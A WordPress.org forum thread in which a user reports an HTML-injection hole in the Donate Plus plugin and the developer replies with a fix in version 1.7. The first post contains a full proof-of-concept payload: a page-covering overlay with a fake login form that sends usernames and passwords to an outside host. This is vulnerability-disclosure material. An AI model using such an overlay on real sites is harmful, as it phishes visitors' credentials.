WordPress.org

1. shalzers
   Member
   Posted 1 year ago #

   I was testing this plug-in and found that I was able to embed potentially malicious html in the page that allowed me to take over the screen and overlay whatever content I wanted. Whoops!

   <div style="position: absolute; left: 0px; top: 0px; width: 1900px; height:
   1300px; z-index: 1000; background-color:white; padding: 1em;">Welcome to
   MyGoat!!1! Please Login wit credentialz for major nigerian cash<br><form
   name="login" action="http://aspectsecurity.com"><table><tr><td>Username:
   </td><td><input type="text"
   name="username"/></td></tr><tr><td>Password:</td><td><input type="text"
   name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit"
   value="Login"/></td></tr></table></form><img</div>

   http://img.skitch.com/20101024-8dd26w5225tjfxh9x1s21shemx.png

   I inserted this html through the wordpress backend but assume there is no validation to prevent this.

   http://wordpress.org/extend/plugins/donate-plus/

2. devbit
   Member
   Posted 9 months ago #

   The donation form (and PayPal) only allows 199 characters which your code exceeds, so it would be quite difficult to do too much damage, but I've taken your concerns to heart and have made sure that the paypal submitted comment also has all tags stripped in version 1.7.

   The admin section is meant for the owner of the site, so it will allow any and all code to be entered into a previously submitted donor wall entry - if you want to hack your own site that is up to you! :)

   Thanks for the input!

Topic Closed

This topic has been closed to new replies.